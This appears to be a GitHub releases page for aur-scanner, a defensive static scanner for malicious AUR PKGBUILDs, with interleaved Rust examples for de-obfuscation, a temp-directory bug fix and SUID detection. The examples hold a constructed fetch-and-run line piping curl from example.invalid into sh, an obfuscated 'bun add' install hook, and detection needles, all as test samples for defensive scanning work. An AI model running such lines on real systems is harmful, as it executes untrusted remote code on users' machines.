
Releases: KiefStudioMA/ks-aur-scanner

aur-scanner 2.0.0

18 Jun 00:36
v2.0.0
07893f5


Major release: optional, opt-in threat-intelligence lookups (VirusTotal +
URLhaus), an active verdict cache, broader AUR-helper coverage (cache discovery
+ shell wrappers + a Nushell integration), and a global --no-color flag. The
default scan is unchanged — fully offline and static; threat intelligence stays
off until you enable it and supply your own keys.

Added — opt-in threat intelligence

  • VirusTotal & URLhaus lookups, wired in for real. The previously inert
    provider stubs are now working: with enable_threat_intel set and a key
    supplied (config or VT_API_KEY/VIRUSTOTAL_API_KEY/URLHAUS_AUTH_KEY), a new
    networked analyzer checks each declared sha256sums against VirusTotal and each
    source= URL against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001
    on a malicious verdict. Off by default — a default scan stays fully
    offline/static. Only data already public in the PKGBUILD (hashes, source URLs)
    is ever transmitted; every lookup fails open so a provider outage never blocks a
    scan. All third-party network code is isolated in a single auditable file
    (threat_intel/remote.rs). URLhaus requires the now-mandatory abuse.ch
    Auth-Key.

    The VirusTotal-by-hash approach is credited to @SuitablyMysterious, whose
    vt_lookup in PR #9 was the reference implementation.

  • Verdict caching is now active. The hardened, MAC-authenticated DiskCache
    (owner-only dir, per-user keyed integrity) — previously built but unwired — now
    caches threat-intel verdicts, so repeat lookups respect VirusTotal's 4-req/min
    public quota. Gated by CacheConfig; lookups are also capped per scan.

Added — broader AUR helper coverage

  • system audit and the pacman hook now cover every maintained AUR helper.
    Cache discovery spans yay, paru, pikaur, aura, pakku, trizen, aurutils, rua, and
    pat-aur — at each helper's real PKGBUILD location (e.g. pikaur's
    ~/.local/share/pikaur/aur_repos, rua's ~/.config/rua/pkg, trizen's
    ~/.cache/trizen/sources), with XDG *_HOME overrides honored.
  • Shell integration wraps more helpers (#6; diagnosis from @nikoraasu in #12).
    pikaur, trizen, and pakku join paru/yay as pre-build gates (they share
    pacman's -S/-Syu grammar); helpers with a different model (aura -A, and the
    subcommand tools aurutils/rua/pat-aur) are covered by the pacman hook instead.
  • Nushell integration (install/integration.nu, #5) — routes
    helper installs through the aur-scan-wrap gate; honors AUR_SCAN_ENABLED=0 and
    provides <helper>-unsafe bypasses. Verified on nushell 0.113.
  • pacman hook now sets NeedsTargets, so the transaction's package names reach
    the hook (it reads targets from stdin to locate each PKGBUILD).

Changed

  • Added a global --no-color flag; colored output also honors the NO_COLOR
    environment variable and auto-disables when not writing to a terminal.

Install

# stable
git clone https://aur.archlinux.org/aur-scanner.git && cd aur-scanner && makepkg -si

Docs: https://aur-scanner.kief.studio · the source tag is GPG-signed (key 25631EAE3F43999050B7D7021132BF893C33FB51).

v1.2.0-rc1 — opt-in threat intelligence (release candidate)

17 Jun 14:01
v1.2.0-rc1
1b689b9


Release candidate — in testing, not for production. A default scan is unchanged: fully offline and static. This RC is published for testing while it bakes.

Added — opt-in threat intelligence

  • VirusTotal & URLhaus lookups, wired in. With enable_threat_intel set and a key supplied (config, or VT_API_KEY/VIRUSTOTAL_API_KEY/URLHAUS_AUTH_KEY), a new networked analyzer checks each declared sha256sums against VirusTotal and each source= URL against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001 on a malicious verdict.
  • Off by default. Only data already public in the PKGBUILD (hashes, source URLs) is ever sent; every lookup fails open so a provider outage never blocks a scan. URLhaus requires the now-mandatory abuse.ch Auth-Key.
  • All third-party egress is isolated in one auditable file (crates/aur-scanner-core/src/threat_intel/remote.rs) — HTTPS-only, no-redirect, time-bounded.
  • Verdict cache activated. The hardened, MAC-authenticated DiskCache now caches lookups (gated by CacheConfig), and lookups are capped per scan, to respect VirusTotal's 4-request/min public quota.

Credit

The VirusTotal-by-hash approach was contributed by @SuitablyMysterious — the vt_lookup in #9 was the reference implementation.

Full notes: see CHANGELOG.md.

v1.1.0 — anti-evasion hardening (stable)

15 Jun 14:07
v1.1.0
edfa1ae


Stable. Promotes the 1.1.0 release-candidate line and folds in a second hardening wave that closes the residual evasion classes from an adversarial self-audit.

Detection — evasion classes closed: variable-indirection taint pass (a fetch/exec hidden behind a shell variable now resolves and flags), case-insensitive structural analyzers, host-aware URL/IOC matching, a supply-chain/packaging-metadata analyzer, and quote-aware printed-message filtering.

Hardening: authenticated cache verdicts (per-user MAC), an allowlisted makepkg build environment, --force can never override an unscannable package, and --local scans only attribute a verdict to a name that provably matches.

Quality: a self-adversarial evasion fuzzer now runs as a release gate — every malicious fixture is mutated through a library of semantics-preserving evasion transforms and the gate must still block each one.

Threat reports that informed this line: #2 (@LunarEclipse363) and #10 (@zebulon2). See CHANGELOG.md for the full entry. Report detection weaknesses privately via a GitHub Security Advisory (SECURITY.md).

v1.1.0-rc3 — pre-ship hardening + exhaustive download-exec sink coverage

15 Jun 12:56
v1.1.0-rc3
71f1e82


Release candidate. Security-hardening release: an adversarial pre-ship review closed six real defects across the gate, parser, and detection layers, plus exhaustive shell/interpreter download-exec coverage (24 shells + 20+ interpreters), EXEC-006 (sqlite3 dot-commands) and EXEC-007 (make from stdin), and quote-aware printed-message filtering. The pacman hook's privilege-drop decision logic is now test-covered.

See CHANGELOG.md for the full [1.1.0-rc3] entry. Detection-weakness reports: please use a private GitHub Security Advisory (SECURITY.md), not a public issue.

aur-scan 1.1.0-rc2 (release candidate)

15 Jun 01:57
v1.1.0-rc2
b924599


Pre-release

Proactive detection expansion + anti-evasion.

Install

gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51   # one-time
paru -S aur-scanner-rc                                      # or: yay -S aur-scanner-rc

Highlights

  • De-obfuscation engine — decodes ANSI-C quoting ($'\x63') and adjacent-quote splitting ("b"'u''n'), then runs the whole catalog against the decoded text. The live obfuscated AUR wave (a bun add JS payload hidden in a post_install hook) is now flagged critical, not just a generic high.
  • +28 detection rules across reverse shells, exfiltration, auth/system tampering, supply-chain trust, and RCE. Catalog 72 → 106 codes.
  • aur-scan install cleans its own build dir (--keep-build to retain).
  • Packaging: options=('!debug' '!strip') — no more empty -debug package or gdb/fakeroot noise.
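
The two quoting tricks named in the first highlight are easy to describe and easy to get subtly wrong (octal escapes, escaped quotes inside double quotes). The block below is an added example written for this page, not the project's de-obfuscation engine: a std-only Rust decoder that collapses '...', "...", and $'...' into the literal text the shell would see, followed by a constructed two-rule catalog run over both the raw and decoded text. decode_shell_quoting, matching_rules, the rule codes EXAMPLE-RCE-00x and the sample hook are all assumptions of the example.

```rust
// Added example, not the project's code: decode bash ANSI-C quoting and
// adjacent-quote splitting, then match a constructed catalog against the
// decoded text. RULES and OBFUSCATED_HOOK are constructed for illustration.

/// Collapse shell quoting into the literal characters the shell would see.
/// Handles '...', "..." (with \" \\ \$ \` escapes) and $'...' with
/// \n \t \\ \' \xHH and \NNN escapes. Static only: no expansions are run.
pub fn decode_shell_quoting(src: &str) -> String {
    let c: Vec<char> = src.chars().collect();
    let mut out = String::new();
    let mut i = 0;
    while i < c.len() {
        if c[i] == '$' && i + 1 < c.len() && c[i + 1] == '\'' {
            i += 2; // inside $'...'
            while i < c.len() && c[i] != '\'' {
                if c[i] != '\\' || i + 1 >= c.len() {
                    out.push(c[i]);
                    i += 1;
                    continue;
                }
                i += 1; // now at the escaped character
                match c[i] {
                    'n' => { out.push('\n'); i += 1; }
                    't' => { out.push('\t'); i += 1; }
                    '\\' => { out.push('\\'); i += 1; }
                    '\'' => { out.push('\''); i += 1; }
                    'x' => {
                        let (val, used) = read_digits(&c, i + 1, 16, 2);
                        if used == 0 { out.push_str("\\x"); i += 1; }
                        else { out.push(char::from((val & 0xff) as u8)); i += 1 + used; }
                    }
                    '0'..='7' => {
                        let (val, used) = read_digits(&c, i, 8, 3);
                        out.push(char::from((val & 0xff) as u8));
                        i += used;
                    }
                    other => { out.push('\\'); out.push(other); i += 1; }
                }
            }
            i += 1; // closing quote
        } else if c[i] == '\'' {
            i += 1;
            while i < c.len() && c[i] != '\'' { out.push(c[i]); i += 1; }
            i += 1;
        } else if c[i] == '"' {
            i += 1;
            while i < c.len() && c[i] != '"' {
                if c[i] == '\\' && i + 1 < c.len() && matches!(c[i + 1], '"' | '\\' | '$' | '`') {
                    i += 1;
                }
                out.push(c[i]);
                i += 1;
            }
            i += 1;
        } else {
            out.push(c[i]);
            i += 1;
        }
    }
    out
}

/// Parse up to `max` digits in `radix` starting at `at`; returns (value, digits consumed).
fn read_digits(c: &[char], at: usize, radix: u32, max: usize) -> (u32, usize) {
    let (mut val, mut used) = (0u32, 0usize);
    while at + used < c.len() && used < max {
        match c[at + used].to_digit(radix) {
            Some(d) => { val = val * radix + d; used += 1; }
            None => break,
        }
    }
    (val, used)
}

/// Constructed catalog: codes and needles are illustrative, not the project's.
pub const RULES: &[(&str, &str)] = &[
    ("EXAMPLE-RCE-001", "bun add"),
    ("EXAMPLE-RCE-002", "curl "),
];

/// Run the catalog on the raw text and on the decoded text; the union is
/// what a reviewer should see, so decoding never hides a plain-text hit.
pub fn matching_rules(text: &str) -> Vec<&'static str> {
    let decoded = decode_shell_quoting(text);
    RULES.iter()
        .filter(|(_, needle)| text.contains(*needle) || decoded.contains(*needle))
        .map(|(code, _)| *code)
        .collect()
}

/// Constructed sample: `bun add` split across quotes and hex-escaped.
pub const OBFUSCATED_HOOK: &str = "post_install() {\n  \"b\"'u''n' $'\\x61\\x64\\x64' some-js-pkg\n}\n";

fn main() {
    print!("{}", decode_shell_quoting(OBFUSCATED_HOOK));
    println!("{:?}", matching_rules(OBFUSCATED_HOOK));
}
```

Running the catalog on the union of raw and decoded text matters: a decoder bug that swallowed a character would otherwise turn a plain-text `curl ... | sh` into a miss, so the decoded pass may only add findings, never remove them.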

Full notes: CHANGELOG

aur-scan 1.1.0-rc1 (release candidate)

14 Jun 16:08
v1.1.0-rc1
52461d9


Pre-release

Security-hardening release candidate. Test it before it's promoted to stable.

Install (opt-in RC channel)

gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51   # one-time, if your helper doesn't auto-fetch
paru -S aur-scanner-rc                                      # or: yay -S aur-scanner-rc

aur-scanner-rc builds this GPG-signed tag and conflicts with the stable
aur-scanner — install only one. Production systems should stay on
aur-scanner.

AUR channels

Package                        Channel
aur-scanner / ks-aur-scanner   Stable (recommended)
aur-scanner-rc                 Release candidate (this build)
aur-scanner-git                Rolling (latest commit)

⚠️ Behavior changes

  • Fails closed. The paru/yay wrapper and the pacman hook now deny on a
    scan/fetch error, a timeout, or a non-interactive (no-TTY) prompt instead of
    proceeding. If you drive an AUR helper from scripts/cron/CI, an install that
    can't be fully analyzed is refused rather than silently allowed.
  • scan --format json/sarif emit only the machine document on stdout; the
    human summary moved to stderr (so aur-scan scan --format json | jq works).

Security

Input-validation chokepoint for package names/bases, network hardening
(redirects refused, HTTPS-only, size-capped bodies, percent-encoded RPC URLs),
the pacman hook drops root before reading user caches and refuses symlinked
PKGBUILDs, detection-evasion fixes (line-continuation splicing, quote/comment-
aware brace scanning, broadened reverse-shell + crypto-address detection,
checksum SKIP-laundering), and bytes bumped to 1.11.1 (RUSTSEC-2026-0007).

aur-scan 1.0.3

13 Jun 23:01
v1.0.3
7aae5c0



Fixed — false negative in aur-scan check (important)

The check command fetched each AUR package into a temporary directory, then
dropped the handle (deleting the clone) before scanning it. Every fetched
node errored with "IO error: No such file or directory" and the command reported
no findings — so packages with real issues looked clean. This affected the
default gate mode of the shell integration; the race-free install path and
the system audit were not affected.

Reproduced and verified: before the fix, check google-chrome reported clean;
after, it correctly surfaces its HIGH findings.

Thanks to Rafael Lucio (@Disklo) for the report and fix (#4).
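
The defect above is a lifetime bug that is easy to reproduce with any RAII temp-directory guard: if the fetch step returns only the path and lets the guard go out of scope, the directory is deleted before the scanner reads it, and a caller that swallows the I/O error reports a clean package. The following is an added example written for this page, not the project's check command or its fix: a std-only Rust model with a minimal guard (TempClone, the same contract as tempfile::TempDir), a stand-in fetch and a stand-in scan, showing the buggy and the corrected ownership side by side. All names are assumptions of the example.

```rust
// Added example, not the project's code: the temp-directory lifetime bug
// (guard dropped before the scan) beside the fix (guard returned to the caller).
// TempClone, fetch_into and scan are constructed stand-ins.
use std::fs;
use std::io;
use std::path::{Path, PathBuf};
use std::sync::atomic::{AtomicU64, Ordering};

static COUNTER: AtomicU64 = AtomicU64::new(0);

/// Minimal RAII temp directory: removed when the guard is dropped.
pub struct TempClone { path: PathBuf }

impl TempClone {
    pub fn new() -> io::Result<Self> {
        let n = COUNTER.fetch_add(1, Ordering::SeqCst);
        let path = std::env::temp_dir()
            .join(format!("aur-scan-example-{}-{}", std::process::id(), n));
        fs::create_dir_all(&path)?;
        Ok(TempClone { path })
    }
    pub fn path(&self) -> &Path { &self.path }
}

impl Drop for TempClone {
    fn drop(&mut self) { let _ = fs::remove_dir_all(&self.path); }
}

/// Stand-in for cloning an AUR package: writes a PKGBUILD into `dir`.
pub fn fetch_into(dir: &Path, pkgbuild: &str) -> io::Result<()> {
    fs::write(dir.join("PKGBUILD"), pkgbuild)
}

/// Stand-in for the static scanner: counts PKGBUILD lines mentioning `curl`.
pub fn scan(dir: &Path) -> io::Result<usize> {
    let text = fs::read_to_string(dir.join("PKGBUILD"))?;
    Ok(text.lines().filter(|l| l.contains("curl")).count())
}

/// Buggy: only the path escapes, so `clone` is dropped at the closing brace
/// and the directory is gone before anyone can scan it.
pub fn fetch_buggy(pkgbuild: &str) -> io::Result<PathBuf> {
    let clone = TempClone::new()?;
    fetch_into(clone.path(), pkgbuild)?;
    Ok(clone.path().to_path_buf())
}

/// Fixed: the guard itself is handed back, so it lives as long as the scan.
pub fn fetch_fixed(pkgbuild: &str) -> io::Result<TempClone> {
    let clone = TempClone::new()?;
    fetch_into(clone.path(), pkgbuild)?;
    Ok(clone)
}

/// Fails with NotFound; a caller that maps errors to "no findings" would
/// report this package clean.
pub fn check_buggy(pkgbuild: &str) -> io::Result<usize> {
    let path = fetch_buggy(pkgbuild)?;
    scan(&path)
}

pub fn check_fixed(pkgbuild: &str) -> io::Result<usize> {
    let clone = fetch_fixed(pkgbuild)?;
    scan(clone.path()) // `clone` dropped only after scanning
}

fn main() {
    // Constructed sample PKGBUILD with one download-exec line.
    let pb = "pkgname=x\nbuild() {\n  curl -s https://example.invalid/x | sh\n}\n";
    println!("buggy: {:?}", check_buggy(pb).map_err(|e| e.kind()));
    println!("fixed: {:?}", check_fixed(pb));
}
```

The second half of the lesson is the error handling: a gate that turns a per-node I/O error into "no findings" fails open on exactly the packages it could not read, which is why the 1.1.0-rc1 wrappers and hook were later changed to deny when a package cannot be fully analyzed.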

Added — fish shell integration

install/integration.fish wraps paru/yay for fish users, matching the
bash/zsh behavior (gate + race-free install mode, scan-fail abort, bypass
shortcuts). Audited against the existing integrations for parity.

Verify

git verify-tag v1.0.3

aur-scan 1.0.2

13 Jun 20:53
v1.0.2
0ab1362



A correctness and supply-chain-integrity release.

Fixed

  • PRIV-002 false positives. The SUID/SGID matcher flagged any 3-digit chmod
    mode whose first digit was 4–7, so benign chmod 755 / chmod 644 /
    install -m644 raised a critical "SUID bit" finding. It now matches only
    true special-bit modes — 4-digit octal (4755, 2755, 6755) or symbolic
    (u+s, g+s, +s) — with regression tests covering both benign and real cases.
  • Fixed an environment-fragile rule-count test that failed when a community rule
    was installed in rules.d/.
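
The PRIV-002 fix above is a good illustration of how a permission matcher goes wrong: the over-broad check keyed on the first digit of a 3-digit mode, but setuid/setgid live in a fourth, leading digit (4, 2, or 6) or in a symbolic `s`. The block below is an added example written for this page, not the project's PRIV-002 rule: a std-only Rust matcher that recognizes only true special-bit modes, octal or symbolic, via chmod or install(1), shown beside the defective shape so the benign cases from the notes (chmod 755, chmod 644, install -m644) can be checked. Function names and sample lines are assumptions of the example; it goes slightly beyond the notes by also handling install's combined -DmMODE form and comma-separated symbolic clauses.

```rust
// Added example, not the project's code: a SUID/SGID mode matcher of the
// kind PRIV-002 needs, beside the over-broad check that caused the false
// positives. Function names and sample lines are constructed.

/// The defective shape: any 3-digit mode whose first digit is 4..7,
/// so plain 755 and 644 are flagged as "SUID".
pub fn buggy_suid_match(tok: &str) -> bool {
    let b = tok.as_bytes();
    b.len() == 3 && matches!(b[0], b'4'..=b'7') && b.iter().all(|d| d.is_ascii_digit())
}

/// Octal mode whose leading special digit sets setuid (4) or setgid (2):
/// 4755, 2755, 6755, 04755. Not 755, 0755, 0644, or 1777 (sticky only).
pub fn is_special_bit_octal(tok: &str) -> bool {
    let b = tok.trim_start_matches('0').as_bytes();
    b.len() == 4
        && b.iter().all(|d| (b'0'..=b'7').contains(d))
        && ((b[0] - b'0') & 0o6) != 0
}

/// Symbolic mode that adds or sets the s bit: u+s, g+s, +s, ug+s, u=rwxs,
/// or any comma-separated clause doing so. Removal (u-s) is not flagged.
pub fn is_special_bit_symbolic(tok: &str) -> bool {
    tok.split(',').any(|clause| match clause.find(|ch: char| ch == '+' || ch == '=') {
        Some(pos) => clause[pos + 1..].contains('s'),
        None => false,
    })
}

fn is_special_bit_mode(tok: &str) -> bool {
    is_special_bit_octal(tok) || is_special_bit_symbolic(tok)
}

/// Does one shell line set special bits via chmod or install(1)?
/// Understands `chmod MODE ...`, `install -m MODE`, `-mMODE`, `-DmMODE`,
/// `--mode MODE`, `--mode=MODE`, with an optional leading `sudo`.
pub fn sets_special_bits(line: &str) -> bool {
    let toks: Vec<&str> = line.split_whitespace().collect();
    let mut idx = 0;
    while idx < toks.len() && toks[idx] == "sudo" { idx += 1; }
    match toks.get(idx) {
        Some(&"chmod") => toks[idx + 1..]
            .iter()
            .any(|t| !t.starts_with('-') && is_special_bit_mode(t)),
        Some(&"install") => {
            let mut i = idx + 1;
            while i < toks.len() {
                let t = toks[i];
                let mode: Option<&str> = if let Some(m) = t.strip_prefix("--mode=") {
                    Some(m)
                } else if t == "--mode" {
                    i += 1;
                    toks.get(i).copied()
                } else if t.starts_with('-') && !t.starts_with("--") {
                    // short-flag cluster: the mode is whatever follows 'm',
                    // either in the same token (-Dm4755) or the next one (-m 4755)
                    match t.find('m') {
                        Some(p) if p + 1 < t.len() => Some(&t[p + 1..]),
                        Some(_) => { i += 1; toks.get(i).copied() }
                        None => None,
                    }
                } else {
                    None
                };
                if mode.map_or(false, is_special_bit_mode) { return true; }
                i += 1;
            }
            false
        }
        _ => false,
    }
}

fn main() {
    // Constructed PKGBUILD lines: the first three are the benign cases from the notes.
    for line in [
        "chmod 755 \"$pkgdir/usr/bin/foo\"",
        "chmod 644 \"$pkgdir/etc/foo.conf\"",
        "install -m644 foo.conf \"$pkgdir/etc/foo.conf\"",
        "install -Dm4755 foo \"$pkgdir/usr/bin/foo\"",
        "chmod u+s \"$pkgdir/usr/bin/foo\"",
    ] {
        println!("{:5} {:5}  {}", buggy_suid_match(line.split_whitespace().nth(1).unwrap_or("")), sets_special_bits(line), line);
    }
}
```

Keeping the octal and symbolic checks as separate, individually testable predicates is what makes the regression suite the notes mention cheap to write: each benign and each real mode becomes a one-line assertion rather than a whole PKGBUILD fixture.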

Changed — supply-chain integrity

  • The pinned packages (aur-scanner, ks-aur-scanner) now build from the
    GPG-signed git tag and verify it against our signing key
    (validpgpkeys), instead of hashing a GitHub-generated tarball. makepkg
    refuses to build if the tag signature is missing or forged.
  • Import the signing key if your AUR helper does not fetch it automatically:
    gpg --recv-keys 25631EAE3F43999050B7D7021132BF893C33FB51

Verify this release

git verify-tag v1.0.2

Detection, dependency-tree resolution, SBOM generation, and the race-free
install path are unchanged. The scanner remains static-only — it never executes
the package it inspects.